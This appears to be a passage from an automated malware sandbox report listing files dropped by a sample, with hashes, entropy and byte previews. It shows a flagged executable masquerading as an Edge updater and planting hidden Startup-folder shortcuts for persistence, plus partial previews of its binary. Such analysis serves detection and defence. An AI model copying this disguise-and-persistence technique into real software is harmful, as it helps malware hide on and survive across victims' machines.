Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538521" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC929.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 08:19:32 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	189099
Entropy (8bit):	4.111986002390332
Encrypted:	false
SSDEEP:	3072:UmIO2LTgZ4MSRzObGTBZPip7b4uEqxy0XBc:UVO0TgZKRzAOa7b4wy
MD5:	C8734A4D6682676DAD5E8DF2D8DD5094
SHA1:	BC1EBF7A8538A7F8EDD8536E517D2BC8FC4DE7DC
SHA-256:	978BB7961C61D3F4B6F8A64D09CF1BE2198BBAC728756863F10EF14C3D9322B7
SHA-512:	14BD811637E424E9151554079CE269332B92734C018AB6DF114D752FA46452BFD1FE97E136CB49CFED69BB1B353F1167B277CF51C6BDB5C961C627E0DC032E1F
Malicious:	false
Preview:	MDMP..a..... ..........g........................x...........$............ ...9..........`.......8...........T............%..............4........... ...............................................................................eJ..............GenuineIntel............T.......L......g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB3D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.6885881965696288
Encrypted:	false
SSDEEP:	192:R6l7wVeJF5Y6I6Y2DbSUJNT27GgmfZTkprT89bmGsfOCm:R6lXJjY6I6YWSUJNngmftVmlfS
MD5:	A1A952845C722D961D602E049E4DB3D0
SHA1:	C5DE2D6F8A4CCBA070E138AFBB8CFF983DD05CF5
SHA-256:	5449B14B1F956C111BA3709263793DE2FA515F7320CC873276A04B5B5CC351EB
SHA-512:	8AD43AF42B7AF39EB1E9E166C99C957FF50D71E912E2B7EB7E1D0F014776CDC0D6987B06468788C22C1E6E893A93F1A2324EAFDA7A526AC2DAA24D559AABCC03
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB5D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.465072745398112
Encrypted:	false
SSDEEP:	48:cvIwWl8zsVJg77aI983WpW8VYyYm8M4J6IEO7FUF+q8vuEOtd/l9ibd:uIjfvI7SG7VKJ6xXFKLIVlsbd
MD5:	75E4E88005F1937DC9B456CAE7ABB6C1
SHA1:	A1AA416FA63CBA98CF749E1561A20202C23E5950
SHA-256:	AA68E46410C99D80D848926CA0F3591B284EFD029DD5FC4387B66888FE13D353
SHA-512:	2505D59C7D74AD352CF7DA284CAB367791B22B30FB562C56261BBDB74974B25BC050FBE552296FD085D032E42D001C8990D401C6EC4382414A55DA7C6E08D590
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538522" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE4C4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 08:18:33 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	189139
Entropy (8bit):	4.11659233209761
Encrypted:	false
SSDEEP:	1536:NFLQzJpZVLTgaYnAu+B2GK5tT4vCDyZoAM/CiYRuBojR7QXpN4uE2aOWPI60wSVE:NGLTgxc2GAlyl7o4uEqWw60wy39DL
MD5:	C12ECA1A7518BC5278BD5D83C96182CC
SHA1:	642B6EA7ABE9CA4CA510ED9DF28A8610835E9628
SHA-256:	FC1B6627DC08E48856F1F1C7AEEF382314C90BD51FA3B053682672C41F016F70
SHA-512:	000829DD8419981E379BCA0F9B5C10F673BE5C9AE9117A99A8474CDFAF4AEB878B15F034569B35EC6E243ED30E87F1D85E0997A5D7D29A6C4A1D33A5BA6B946F
Malicious:	false
Preview:	MDMP..a..... .......Y..g........................x...........$...........d ...9..........`.......8...........T............%..C...........4........... ...............................................................................eJ..............GenuineIntel............T...........X..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5A0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.6907930869187453
Encrypted:	false
SSDEEP:	192:R6l7wVeJMx86t6Y2DcSU99NNgmfZTkprO89bORsf0l6m:R6lXJMq6t6YRSU99NNgmftGOKfA
MD5:	D3214E584549F49701F4E4FA4A33954B
SHA1:	CAF61AA4CC739EE7396F98E7FE9068EFC6DD76E4
SHA-256:	26193B9E0B6B562471689228C192A3C189124F4EE488E6DF7F9FA3C810D8DAA6
SHA-512:	B6AD4006C01ACB5F53B6343E1DEC5F8A7CAA9F381A96E783FE0C65FA96F66ED6C4A3A2C6DAA0DD3F27F26D4410387C4D70DB906E1132930354EAC0D52E482BC3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5FE.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.464005153747899
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEJg77aI983WpW8VYTPYm8M4J6IEO7Fz0m+q8vuEOtJd/l9iRd:uIjfCI7SG7VeSJ6xO/KL6JVlsRd
MD5:	C080FA08956176BAB44BEBA9031ABBFD
SHA1:	C4387F115513FE2F97AEA7B45824E1066B071A5C
SHA-256:	A236C6E1CFC2EBD6AE8E0CDF36F951847EB99E5A5EAF585BD1428FC1E342FA7C
SHA-512:	FA96E69E02AB4F08C6061F4809B2C912DD744D95AA1AA37AF543D1E5FF9557C8A5C96DC4FE1B2ABF685AD897EA6DF2EBDE9348580A746A7A4D15B4C3ACA56630
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="538521" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Yc9hcFC1ux.exe.log

Download File

Process:	C:\Users\user\Desktop\Yc9hcFC1ux.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	5.522639333280876
Encrypted:	false
SSDEEP:	384:BvV0KF7OERZOTPx3hd/N7az/bCKQIRB1F7M9ekamfrqEjDEFCFUa0gW71JBr:B9LZOTPxNG5z7uTqVCFUa0gWR
MD5:	0E926B28FC49F6259A70C032AE83CD14
SHA1:	ABB5856B3853CFE4ECC5E25FF1A7AA605AFAC007
SHA-256:	3088B0302D4B38C63EF4FEAD57AA6049DA2CC62BF9F4A5D9331552C84FE516E6
SHA-512:	1F4306C38E6604F3945A4D1215576EE81514C34757318035D9220FB81DA5BB4F39D23B8A22F404902FE3E67F0326A1F9FF45DC6CE8D3A41A69AAB54DE488FB77
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..`...........~... ........@.. ....................................`..................................}..O.................................................................................... ............... ..H............text...$^... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B.................~......H.......tE..X8............................................................((...6.\|.....(4...6.\|.....(4...6.\|.....(4...R.sD...%oE....`oF...F.(G...(H...(...+..oL...%:....&.(M....{.....oN...Z.{....rt..p(....(Y...2.{....(>...6.\| ....(4...6.\|$....(4...6.\|(....(4...6.\|0....(4...6.\|4....(4....(f...(...+.r...p(.....7...r...p(.....8...sk....9....s7....:.....ol...6.\|@....(4...6.\|G....(4...6.\|Q....(....6.\|T....(....6.\|X....(4...6.\|]....(4...*..0..n.........(.....

C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe:Zone.Identifier

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Download File

Process:	C:\Users\user\Desktop\Yc9hcFC1ux.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	5.522639333280876
Encrypted:	false
SSDEEP:	384:BvV0KF7OERZOTPx3hd/N7az/bCKQIRB1F7M9ekamfrqEjDEFCFUa0gW71JBr:B9LZOTPxNG5z7uTqVCFUa0gWR
MD5:	0E926B28FC49F6259A70C032AE83CD14
SHA1:	ABB5856B3853CFE4ECC5E25FF1A7AA605AFAC007
SHA-256:	3088B0302D4B38C63EF4FEAD57AA6049DA2CC62BF9F4A5D9331552C84FE516E6
SHA-512:	1F4306C38E6604F3945A4D1215576EE81514C34757318035D9220FB81DA5BB4F39D23B8A22F404902FE3E67F0326A1F9FF45DC6CE8D3A41A69AAB54DE488FB77
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..`...........~... ........@.. ....................................`..................................}..O.................................................................................... ............... ..H............text...$^... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B.................~......H.......tE..X8............................................................((...6.\|.....(4...6.\|.....(4...6.\|.....(4...R.sD...%oE....`oF...F.(G...(H...(...+..oL...%:....&.(M....{.....oN...Z.{....rt..p(....(Y...2.{....(>...6.\| ....(4...6.\|$....(4...6.\|(....(4...6.\|0....(4...6.\|4....(4....(f...(...+.r...p(.....7...r...p(.....8...sk....9....s7....:.....ol...6.\|@....(4...6.\|G....(4...6.\|Q....(....6.\|T....(....6.\|X....(4...6.\|]....(4...*..0..n.........(.....

C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Yc9hcFC1ux.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_00774d3b45e04f12abc622ce376c40af.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:10 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.921482159583011
Encrypted:	false
SSDEEP:	24:8ZtHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8LHfNDp2l9tJRBzfNZ47/yg
MD5:	C6A2296884BA8D71086B594E4EDEA6BA
SHA1:	CA29BA210C5CFE0FFAB6DCBC0E5C1CCF90D53A29
SHA-256:	80A4B39B21A3C6937BD52193C2E03A3A21D7F0AA0CC474C1A5F639FA39222EBE
SHA-512:	AA4D9A23496E320B3968D41CACF926CAE7125A4B3D9E2F6E3092015225F086012CBA6380D67C9A87F498514F06A00349032671CA58D331C830F04F9C7D168786
Malicious:	false
Preview:	L..................F...."............t......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_00b9f3e5a01d41f3b6dd1f946a0c3058.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:38 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926649634047704
Encrypted:	false
SSDEEP:	24:8Z7HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8dHfNDp2l9tJRBzfNZ47/yg
MD5:	D5434F37B489B97A171CCD5C56DBAFD1
SHA1:	A4A7483219D75A5FDAB8DFE19D15E5229D058E15
SHA-256:	9A930112BDAB6DFAD4CB7E072DB7CB0AA7D3FF493BFEA6E5B705AC24C2CE4F3E
SHA-512:	E8695852EDAEDB03F3585685DA1D3D05BDD32845D07F9ED1362B60AC490A38660A189560F62738DE9080A7411240FD9B40C496A0371D43FCB9AE320AA976FD77
Malicious:	false
Preview:	L..................F...."............<x,....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_03e67ecb722e426e86245d879a8c4969.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:59 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925512868138897
Encrypted:	false
SSDEEP:	24:8ZozwHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8cwHfNDp2l9tJRBzfNZ47/yg
MD5:	FE183524B8F00AAB261DD9BDEA8C0BCA
SHA1:	3776DF86F2246FC68025AA4A4D5466A5678ED705
SHA-256:	CFAF847A5A7603A4D264C1329B04801F36A63595560C7C36F1C787CABDD1CA02
SHA-512:	20391C1F69149BB919B3FB2BD3530CBDAB9F19BA00B7F5366ED4D0B141F05D75283862C239726A799A454044F71D350157E96072509B6AC0CF818154DD050B00
Malicious:	false
Preview:	L..................F...."............r......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_092cc48615f64d8eaf2ddae2ed7815c6.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:16 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924013215751205
Encrypted:	false
SSDEEP:	24:8ZUH8Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8WH8Dp2l9tJRBzfNZ47/yg
MD5:	53F5B6BAE1013E68F0E1B5AF4270E376
SHA1:	AA1A86B89DD0946E94A79653E8301A42D8722A76
SHA-256:	08858D9320F420D4CF2CFFD9930804FF9661DD74C8292DCA6609CF56D4D4ACDD
SHA-512:	25B9C3C278792CBE6F6E200F1A872AB2BED20351A3EF51EFAEE7AE623C85CE682D728C9565C5277C7A41C7F719B78A071C8730FCB2EE3BBA67507BF35985F027
Malicious:	false
Preview:	L..................F...."............{C....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........@w.C........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_0d538cad12064978af5a3268dc5d559e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:40 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92334626497859
Encrypted:	false
SSDEEP:	24:8ZjHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8xHfNDp2l9tJRBzfNZ47/yg
MD5:	8B0A8D95D4D7BE7D5B05D20973169FC1
SHA1:	95AE365ADE0DF59FD774EDA074C3F760B88701A4
SHA-256:	FD1936DE35FC1E580A68ADC2D3B8976552DB118464144EC96C86BF89E2140F83
SHA-512:	6A561DD2F04EF1B290BE5B63AEB983A51B9A22EF671090DE0B8CE5BBBACE0C4C9E34DD753B5817E347968905B060D7AFBBAFA6288235D6B1DBD2144B8D606884
Malicious:	false
